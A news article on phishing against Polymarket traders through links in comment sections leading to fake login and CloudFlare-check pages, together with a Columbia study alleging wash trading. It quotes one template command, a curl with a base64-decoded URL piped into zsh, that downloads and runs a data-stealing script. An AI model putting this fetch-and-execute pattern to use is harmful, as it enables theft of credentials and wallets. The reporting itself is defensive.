- Trending
- Comments
- Latest
Users of Polymarket private markets are raising serious concerns after reports emerged of phishing schemes targeting the platform’s traders. According to multiple posts on X (formerly Twitter), hackers have allegedly stolen more than $500,000 from users through deceptive links embedded in Polymarket’s comment sections.
The discovery comes just days after a Columbia University study accused Polymarket of inflated trading volumes due to possible wash trading. The twin issues — security breaches and allegations of fake activity — threaten to undermine confidence in the prediction market platform as it seeks to re-establish operations in the United States and compete with rivals like Kalshi.
A prominent Polymarket trader known as “25usdc” was the first to sound the alarm, revealing that attackers were exploiting the Polymarket private markets comment sections to direct users to phishing websites disguised as legitimate Polymarket pages.
“They say: ‘Why are you not trading on Polymarket private markets? The odds are always much better on there!’” 25usdc wrote, detailing how the scam unfolds.
According to 25usdc, the hackers begin by buying both “Yes” and “No” shares in a market using separate accounts. This strategy ensures their comments remain visible even when users filter posts to display only holders. From there, the attackers post links disguised as legitimate URLs that redirect users to a fake Polymarket login page.
The phishing page mimics the platform’s design, complete with a Polymarket private markets logo and prompts for user email verification. Once users enter their details, a second page — pretending to be a CloudFlare security check — tricks them into copying a malicious command.
“When you click ‘Copy,’ a command that looks something like this ‘curl -kfsSL $(echo ‘ENCODED_STRING==’|base64 -d)|zsh’ is copied instead,” 25usdc explained. “If pasted into a terminal, it downloads and executes a script that logs all user data and sends it back to the hackers’ server.”
The stolen data reportedly includes login credentials and wallet information. In many cases, by the time victims notice unusual activity, the funds have already been drained.
“They gather data, log everything on your system, and send a zip back to their server,” 25usdc added. “They then use this data to log into your accounts and steal your money.”
The trader also noted that the hackers frequently change wallets, obscure code patterns, and deactivate servers to erase traces when no victims are active.
“I think the best way to address this is to allow trusted users to review comments or to introduce a downvote system that hides heavily downvoted posts,” 25usdc suggested, arguing that the existing Polymarket warnings are insufficient protection.
The phishing scandal compounds existing challenges for Polymarket following the Columbia University report suggesting that much of its transaction volume may be artificially inflated by wash trading.
Researchers found that up to 25% of activity on Polymarket private markets over the past three years could be attributed to users trading with themselves to create the illusion of higher liquidity. The findings were published on the Social Science Research Network (SSRN) and are now under review by Polymarket.
“I’m hopeful that Polymarket will welcome the analysis in our paper,” said Yash Kanoria, Professor at Columbia Business School and one of the study’s authors. “Wash trading doesn’t add liquidity or information to the market, so it would seem valuable to distinguish authentic from inauthentic volume.”
While the paper does not accuse Polymarket itself of wrongdoing, it highlights structural features of Polymarket private markets that could enable such manipulation.
The authors also suggested that some users may have engaged in wash trading to improve their chances of qualifying for a rumored token airdrop hinted at by Polymarket founder Shayne Coplan in October.
If the claims of both phishing and wash trading are verified, the implications for Polymarket private markets could be significant. The platform has been seen as a leading player in the decentralized prediction market space, but these revelations may affect user confidence and regulatory approval in its planned U.S. expansion.
“The potential for large-scale wash trading means that volume may be unreliable as a metric of authentic platform activity, especially in cryptocurrency-based exchanges which may not have proper safeguards,” the Columbia researchers warned.
As investigations continue, users of Polymarket private markets are advised to exercise caution, verify links, and avoid executing any unfamiliar terminal commands.
Whether Polymarket can restore trust amid growing scrutiny remains to be seen — but with user funds at risk and academic claims of manipulated volume, the prediction market’s credibility faces one of its most serious tests yet.
